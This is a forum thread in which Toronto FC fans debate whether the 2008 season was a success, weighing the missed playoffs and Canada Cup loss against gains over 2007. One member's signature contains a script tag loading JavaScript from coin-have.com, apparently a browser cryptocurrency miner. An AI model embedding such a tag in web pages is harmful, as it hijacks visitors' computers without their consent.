Page 1 of 5 12345 LastLast
    olegunnar

Default In your opinion was this year a success?

In another thread Parkdale has said he believes this year was a success because he thinks the on field product was better this year than last. Fair enough.

That made me think that rather than a poll or a simple yes/no, it would be interesting to see not only if people thought this year was a success, but also how they graded the team.

Me, personally, my expectations were 1) playoffs (the captain guaranteed it) and 2) Canada Cup win (we're in the "better" league). So in my books the year was a failure since we were 0 for 2.

What were other people's expectations based on? Did the team meet them?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I would tend to agree.

Where we a better team than last year? No doubt about it.

Was this year a success? Definitely not.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shaughno View Post
    I would tend to agree.

Where we a better team than last year? No doubt about it.

Was this year a success? Definitely not.
    Exactly the same thoughts Shaughno

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I say yes (as you saw in the thread).

The product was better this year, the games were more exciting and more enjoyable to watch. In our 2007 season, we finished 13th overall (aka last). Maybe I'm just not setting the bar very high, but we improved over last year. I's improvement success? In my books, yes. Not a lot, but it's still on the positive side of the scale.

Obviously I would have loved to see things finish differently, especially the Canada Cup, but there's plenty more chances for that down the road.
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

the issue is if we keep saying better luck next year, we'll never see said improvements.
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

olegunnar

Quote Originally Posted by Parkdale View Post
    I say yes (as you saw in the thread).

The product was better this year, the games were more exciting and more enjoyable to watch. In our 2007 season, we finished 13th overall (aka last). Maybe I'm just not setting the bar very high, but we improved over last year. I's improvement success? In my books, yes.

Obviously I would have loved to see things finish differently, especially the Canada Cup, but there's plenty more chances for that down the road.
    Your post made me think.

So I don't want this to turn into a Parkdale is stupid thread, this time.
    Or a we suck thread.
    I just thought maybe people would have different ways they personally graded the overall success or lack thereof of the 2008 season. I was curious to hear them.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by br_aguilar View Post
    the issue is if we keep saying better luck next year, we'll never see said improvements.
    'luck' shouldn't come into it. What we need is for Mo and John to be realistic about our strengths and weaknesses and make modifications to capitalize on our improvements. Take luck as far away from the game as possible. The on field play was better this year, especially in the last few games, so we need to ride that momentum into the pre-season and next year.

where's that quote....

TFC captain Jim Brennan said after the game that even if team missed the post-season, their recent success would keep them optimistic.
    "We'll be disappointed. For sure we will, because that's what you want to do for ourselves, for our fans," he said. "But if we don't make the playoffs, we've just got to carry that momentum forward into next year."

from the star on sunday

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by olegunnar View Post
    So I don't want this to turn into a Parkdale is stupid thread, this time.
    Or a we suck thread.
    don't worry, I have enough of those around here, and I know that's not the intention.

I might be the odd guy out on this topic, but I think that being better than the past is a success. That's just the criteria that I'm using to judge the season. Really this thread is about the individual criteria used to say if it was good or bad.

did I have a hell of a lot of fun this year? SUCCESS
    did the club set a record for the longest goal drought ever? no? SUCCESS!
    did the club get to the playoffs? almost.
    did we not clobber two USL teams. EPIC FAIL

Barbarez

...and this is why the FO will keep selling tickets... guys who have never played a game of soccer judging success based on how much fun they had at the game. Nobody cares if you had a 'blast' at the game, there is still some of us who care about the quality of this team. The quality of our team is still shit and losing to USL teams and not making the play offs proves my point.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Again it depends on what you defined as results in the beginning of the year from my perspective.

Improvements does not equal success in my mind.

We were told the goals were to win the Nutrigrain Ultralight Kanuckistan Cup and to make the playoffs. Neither of those goals were achieved, therefore the success doesn't enter the equation.

Are we a better and improved team all around from last year? Damn right we are but I see success as measured in results and achieving goals.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

No, we didn't make the playoffs nor any substantial improvements unfortunately.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Bitterly disappointed by the Canada Cup (or Amway/Nutrilite whatever-it-is). happy about our home record in general, but think it could have been better. Disappointed with the road performances overall - several games seemed to have less than full effort. A little disappointed at the revolving door player policy. Better players overall though. Happy with the coach and his decisions.

If success is what you expected for the year, then I think we were successful. But I've still got a hollow feeling for what might have been.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

i think improvement is just that...improvement.

Success, to me is defined by making the playoffs, not loosing to usl teams and what not.

Once again, it really depends what you think success is.....
    HTML Code:

RPB Member
    Past President

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think after next Saturday when we look back at the season, personally I will say that it has been a massive dissapointment.

It started with the lack of signings by Mo in the offseason which left us all (including Nigel Reed) scratching our heads as to why there weren't any improvements made.

Suddenly the additions of Laurent Robert, Rohan Ricketts and Amado Guevara gave us hope that the tide could be turned and we could be a force in the league. A winning streak at home and we we're flying!

I think the biggest dissapointment of the year was the downward spiral of Robert followed by the awful (and at times baffling) losing streak in the middle of the season.

That's not to say that there weren't positives from the season - there were several

- Robbo solidifies his role after being a little lost in the formation last year
    - The addition of Ricketts and Guevara brought some style and flair to the team
    - Sutton has a stand out season and does well to bounce back from last years concussion
    - TFC shows that they have the potential to compete with any team in the league

Next season big improvements need to be made - the revolving door needs to slow and this team NEEDS to make the playoffs.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

If I am constricted by a narrow definition of success (ie. playoffs, or for some people, MLS cup) then no, it was not a success.

Am I disappointed in this year? A little. But I saw enough improvement that this year is not a let-down either. I think next year is a defining year for the franchise. If there is any regression whatsoever, I think it would be devastating.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by canadian_bhoy View Post
    Next season big improvements need to be made - the revolving door needs to slow and this team NEEDS to make the playoffs.
    thats it right there...the team for the past few weeks have played well due to the somewhat consistent roster (minus international games)

Next year is a very important year for the team. We all have expectations that we need to be met
    HTML Code:

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by br_aguilar View Post
    Next year is a very important year for the team. We all have expectations that we need to be met
    I think the expectations for more were there this year. I'm not sure that making the playoffs and getting put out early would have sufficed. I'd rather be where we are and move to the top of the table if we are ready to do so, rather than be competitive also-rans every year.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

1. League - Yes it was a success, we improved from last year. We brought in players will skill and who want to be here.

2. Canada Cup - A disgrace.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Barbarez View Post
    ...and this is why the FO will keep selling tickets... guys who have never played a game of soccer judging success based on how much fun they had at the game. Nobody cares if you had a 'blast' at the game, there is still some of us who care about the quality of this team. The quality of our team is still shit and losing to USL teams and not making the play offs proves my point.

so let me ask you this.... if you didn't enjoy going to the game, then why would you keep going? I can have a fun at the match even if we loose. Support on the good days, support more on the bad days.

oh, and I played and reffed for years, in case that was directed specifically at me.

olegunnar

Quote Originally Posted by Roogsy View Post
    If I am constricted by a narrow definition of success (ie. playoffs, or for some people, MLS cup) then no, it was not a success.

Am I disappointed in this year? A little. But I saw enough improvement that this year is not a let-down either. I think next year is a defining year for the franchise. If there is any regression whatsoever, I think it would be devastating.

Come on man, I tried to have a civil thread.

Constricted by a narrow definition of success? You mean like league tables?
    MLS cup? Not one person in this thread has said anything about the MLS cup...where'd that come from.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

MLS cup? Not one person in this thread has said anything about the MLS cup...where'd that come from.
    you get used to it
    HTML Code:

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

It's Roogsy man, he does that.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

me no get it!

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

again..... like olegunnar was aiming for.....

what's your criteria for 'success' and did TFC meet that challenge

for most people, the simple answer is 'no we didn't make the playoffs' but if there's more to it, then describe:

RPB Member
    Past President

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Parkdale View Post
    again..... like olegunnar was aiming for.....

what's your criteria for 'success' and did TFC meet that challenge

for most people, the simple answer is 'no we didn't make the playoffs' but if there's more to it, then describe:
    Go read my post.

Oh and one of the Positives I forgot

John Carver +1

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This was a good year in my opinion. Yes, some games were tough, but there were many quality games to watch. The players on the pitch are of a higher level then what we had last year. The fact that we were in playoff contention until the final 2 weekends should mean something too.....how early were we out last year??

compare this year to last
    2007 - 6 wins, 25 pts
    2008 - 9 wins, 35 pts

I'd say 50% more wins and 40% more points is a success......

oh, and I had a blast this year, regardless of the games, being more involved and social within the group.....so yay me!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

the way i see it is we had 2 coaches in 2 years...... you cant expect a team to go from last place to play-off contender with 2 different people at the helm of the ship.

The players had to work with two different styles of play from one year to the next while at the same time had to deal with the revolving door at TFC.

Those who expected major improvement this year are surely dissapointed or even upset but realistically i dont think TFC ever had much chance of making the playoffs this year.

The Canadian CCL spot was squandered, even after all i mentioned. There aren't any excuses for that one.

But next year, will be a defining year. Absolutley. TFC should make the playoffs, no excuses and no exceptions.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I'd go even further to include the team's own goals as a major defining point.

Since the team was expecting to make the playoffs and win the CCup, it was not a success for them.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

That wasn't directed at you Ole but rather a general description of some people who are never satisfied short of winning it all. For some, that is the only definition of success. I didn't mean to indicate that this was your definition of success.

It was a general statement.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shaughno View Post
    It's Roogsy man, he does that.
    Excuse me?